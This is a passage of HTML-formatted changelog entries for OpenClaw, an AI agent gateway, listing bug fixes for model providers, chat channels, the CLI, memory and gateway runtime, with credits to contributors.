<li>Memory/LanceDB: return real memory records from <code>openclaw ltm list</code> (with optional <code>--limit</code> and createdAt ordering) instead of an empty placeholder, so the CLI surface matches the documented LTM listing contract. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279969994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67952/hovercard" href="https://github.com/openclaw/openclaw/pull/67952">#67952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyue19921010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyue19921010">@zhangyue19921010</a>.</li>
<li>Media: include redacted per-attempt resize failures and resolved model input capabilities in vision-pipeline errors so ARM64 image failures are diagnosable without closing the remaining routing investigation. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352922423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74552/hovercard" href="https://github.com/openclaw/openclaw/issues/74552">#74552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Control UI/i18n: route zh-CN agent, debug, channel-refresh, and exec-approval copy through the locale source while preserving the English <code>Cron Jobs</code> agent tab label and the security-audit command styling. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040969776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39692/hovercard" href="https://github.com/openclaw/openclaw/pull/39692">#39692</a> repair context. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hepeng154833488/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hepeng154833488">@hepeng154833488</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: honor explicit <code>silentReply.direct: "allow"</code> for clean empty or reasoning-only direct chat turns while keeping the default direct-chat empty-response guard conservative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351432589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74409/hovercard" href="https://github.com/openclaw/openclaw/issues/74409">#74409</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesuskannolis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesuskannolis">@jesuskannolis</a>.</li>
<li>OpenAI Codex: send a non-empty Responses input item when a Codex turn only has systemPrompt-backed instructions, avoiding ChatGPT backend 400s from <code>input: []</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346425036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73820/hovercard" href="https://github.com/openclaw/openclaw/issues/73820">#73820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>.</li>
<li>Ollama: normalize provider-prefixed tool-call names at the native stream boundary so Kimi/Ollama calls such as <code>functions.exec</code> dispatch as <code>exec</code> instead of missing configured tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352343792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74487/hovercard" href="https://github.com/openclaw/openclaw/issues/74487">#74487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carreipeia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carreipeia">@carreipeia</a>.</li>
<li>Security/audit: resolve configured model aliases before model-tier and small-parameter checks, so alias-based GPT-5/Codex configs no longer report false weak-model warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351877071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74455/hovercard" href="https://github.com/openclaw/openclaw/issues/74455">#74455</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>CLI/agent: isolate Gateway-timeout embedded fallback runs under explicit <code>gateway-fallback-*</code> sessions so accepted Gateway runs cannot race transcript locks or replace the routed conversation session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222569416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62981/hovercard" href="https://github.com/openclaw/openclaw/issues/62981">#62981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>CLI/QR/device-pair: reject malformed public setup URLs before issuing mobile pairing bootstrap tokens, while keeping valid bare host:port setup URLs supported. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Models/UI: hide unauthenticated providers from the default Web chat, <code>/models</code>, and model setup pickers while keeping explicit full-catalog browse paths through <code>view: "all"</code>, <code>/models &lt;provider&gt; all</code>, and <code>models list --all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351540119" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74423/hovercard" href="https://github.com/openclaw/openclaw/issues/74423">#74423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Ollama: keep explicit local model runs on target-provider runtime hooks when PI discovery is skipped, so one-shot Ollama calls no longer cold-load unrelated provider runtimes before streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>Slack/prompts: rely on Slack <code>interactiveReplies</code> guidance instead of generic <code>inlineButtons</code> config hints so enabled Slack button directives are not contradicted. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077041050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46647/hovercard" href="https://github.com/openclaw/openclaw/issues/46647">#46647</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeremykoerber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeremykoerber">@jeremykoerber</a>.</li>
<li>Slack/reactions: treat duplicate <code>already_reacted</code> responses as idempotent success so repeated agent reaction adds no longer surface as tool failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291287868" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69005/hovercard" href="https://github.com/openclaw/openclaw/issues/69005">#69005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shipitsteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shipitsteven">@shipitsteven</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Discord: cool down Cloudflare/Error 1015 HTML 429 REST failures during startup application lookup and gateway metadata fetches, add <code>channels.discord.applicationId</code> as an app-id lookup bypass, sanitize HTML bodies before logging, and honor Retry-After before falling back to a conservative cooldown. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038404026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38853/hovercard" href="https://github.com/openclaw/openclaw/issues/38853">#38853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352352572" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74489" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74489/hovercard" href="https://github.com/openclaw/openclaw/pull/74489">#74489</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Garyko0730/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Garyko0730">@Garyko0730</a>.</li>
<li>Slack/tools: expose <code>fileId</code> in the shared message tool schema so <code>download-file</code> can receive Slack attachment IDs from inbound placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074134594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45574/hovercard" href="https://github.com/openclaw/openclaw/issues/45574">#45574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chadvegas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chadvegas">@chadvegas</a>.</li>
<li>Exec: reject invalid per-call <code>host</code> values instead of silently falling back to the default target, so hostname-like values fail before commands run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351549756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74426/hovercard" href="https://github.com/openclaw/openclaw/issues/74426">#74426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scr00ge-00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scr00ge-00">@scr00ge-00</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Google/Gemini: send non-empty placeholder content when a Gemini run is triggered with empty or filtered user content, avoiding <code>contents is not specified</code> API errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaoYuhaoCarl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaoYuhaoCarl">@CaoYuhaoCarl</a>.</li>
<li>Heartbeat: preserve non-task <code>HEARTBEAT.md</code> context around <code>tasks:</code> blocks and apply <code>agents.defaults.heartbeat</code> to all agents unless per-agent heartbeat entries restrict scope. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sekhar03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sekhar03">@Sekhar03</a>.</li>
<li>Markdown: preserve paragraph breaks inside loose list items in shared outbound formatting while keeping tight list spacing stable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Build/Gateway: route restart, shutdown, respawn, diagnostics, command-queue cleanup, and runtime cleanup through one stable gateway lifecycle runtime entry so rebuilt packages do not strand long-running gateways on stale hashed chunks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347423967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73964" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73964/hovercard" href="https://github.com/openclaw/openclaw/pull/73964">#73964</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Memory/wiki: keep broad shared-source and generated related-link blocks from turning every page into a search hit, cap noisy backlinks, support all-term searches such as people-routing queries, and prefer readable page body snippets over generated metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Cron/Gateway: abort and bounded-clean up timed-out isolated agent turns before recording the timeout, so stale cron sessions cannot leave Discord or other chat lanes stuck in <code>processing</code> after a timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/errors: suppress malformed streaming tool-call JSON fragments before they reach chat surfaces while preserving provider request-validation diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187420949" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59076/hovercard" href="https://github.com/openclaw/openclaw/issues/59076">#59076</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187447924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59080/hovercard" href="https://github.com/openclaw/openclaw/issues/59080">#59080</a> as duplicate coverage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187915161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59118/hovercard" href="https://github.com/openclaw/openclaw/pull/59118">#59118</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/singleGanghood/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/singleGanghood">@singleGanghood</a>.</li>
<li>CLI/models: restore provider-filtered <code>models list --all --provider &lt;id&gt;</code> rows for providers without manifest/static catalog coverage, including Anthropic and Amazon Bedrock, while keeping the compatibility fallback off expensive availability and resolver paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep manifest auth-evidence credentials visible across <code>models status</code>, auth probes, and PI model discovery so workspace-scoped provider auth does not disagree between listing, probing, and execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move local credential evidence such as Google Vertex ADC into generic plugin manifest setup metadata so the model-list auth index stays declarative without provider-specific runtime branches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: compute the <code>models list</code> Auth column through one command-local provider auth index so row rendering no longer repeats auth profile, env, configured-provider, AWS, or synthetic-auth checks per model row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move the OpenAI listable catalog into the plugin manifest so <code>models list --all --provider openai</code> uses the manifest fast path instead of loading provider runtime normalization hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/tools: keep the Gateway <code>tools.*</code> RPC namespace out of plugin command discovery and managed proxy startup, so stray commands like <code>openclaw tools effective</code> fail quickly instead of cold-loading plugin metadata. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>CLI/status: keep default text <code>openclaw status --usage</code> on metadata-only channel scans unless <code>--deep</code> or <code>--all</code> is set, and send stray <code>openclaw tools --help</code> through the precomputed root-help fast path so latency-triage commands avoid plugin/runtime cold loads before printing. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349031630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74220/hovercard" href="https://github.com/openclaw/openclaw/pull/74220">#74220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/diagnostics: trace embedded-run startup and preparation stage timings before model I/O, and warn only on severe slow stages, so Docker/VPS latency reports can identify whether plugin loading, auth/model resolution, tool inventory, bootstrap, MCP/LSP, resource loading, or stream setup is dominating pre-run latency without noisy normal logs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Heyvhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Heyvhuang">@Heyvhuang</a>.</li>
<li>Agents/subagents: cache persisted subagent run registry reads by file signature while preserving fresh-parse isolation, so busy gateways stop reparsing unchanged <code>subagents/runs.json</code> on controller/list/status hot paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/argus-as/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/argus-as">@argus-as</a>.</li>
<li>Gateway/clients: wait for the event loop to become responsive before opening Gateway WebSocket RPC/probe/client connections while charging that readiness wait to caller timeouts, so Windows deferred module-evaluation stalls no longer turn healthy loopback gateways into false handshake timeouts across status, TUI, ACP, MCP, node-host, and plugin client paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349780099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74279/hovercard" href="https://github.com/openclaw/openclaw/issues/74279">#74279</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4082797740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48270" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48270/hovercard" href="https://github.com/openclaw/openclaw/pull/48270">#48270</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wongcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wongcode">@wongcode</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joost-heijden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joost-heijden">@joost-heijden</a>.</li>
<li>Gateway/Windows: read listener command lines via PowerShell before falling back to <code>wmic</code>, so restart health can recognize OpenClaw listeners on modern Windows installs and avoid long anonymous-port waits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349819170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74280/hovercard" href="https://github.com/openclaw/openclaw/issues/74280">#74280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zym951223/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zym951223">@zym951223</a>.</li>
<li>Plugins/runtime-deps: record process start-time in bundled dependency install locks and expire recycled-PID locks, so Docker gateway restarts recover from stale <code>.openclaw-runtime-deps.lock</code> directories without waiting through repeated five-minute timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350992165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74361/hovercard" href="https://github.com/openclaw/openclaw/pull/74361">#74361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Plugins/runtime-deps: memoize packaged bundled runtime dist-mirror preparation after the first successful pass while keeping source-checkout mirrors refreshable, so constrained Docker/VPS installs avoid repeated root scans before chat turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341661895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73421" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73421/hovercard" href="https://github.com/openclaw/openclaw/issues/73421">#73421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/antoniusfelix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/antoniusfelix">@antoniusfelix</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkobject/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkobject">@jkobject</a>.</li>
<li>Channels/Discord: treat bare numeric outbound targets that match the effective Discord DM allowlist as user DMs while preserving account-specific legacy <code>dm.allowFrom</code> precedence over inherited root <code>allowFrom</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350101821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74303" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74303/hovercard" href="https://github.com/openclaw/openclaw/pull/74303">#74303</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Channels/Discord/Slack: share one DM policy/allowlist resolver across runtime, setup, allowlist editing, and doctor repair, so legacy <code>dm.policy</code> / <code>dm.allowFrom</code> compatibility migrates to canonical <code>dmPolicy</code> / <code>allowFrom</code> without divergent access checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Control UI: make the chat sidebar split divider focusable, keyboard-resizable, ARIA-described, and pointer-event based so sidebar resizing works without a mouse. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/usage: keep PI embedded-run telemetry attributed to the resolved model provider instead of the PI harness label, so OpenRouter and other provider-backed turns report the right provider in session usage and traces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
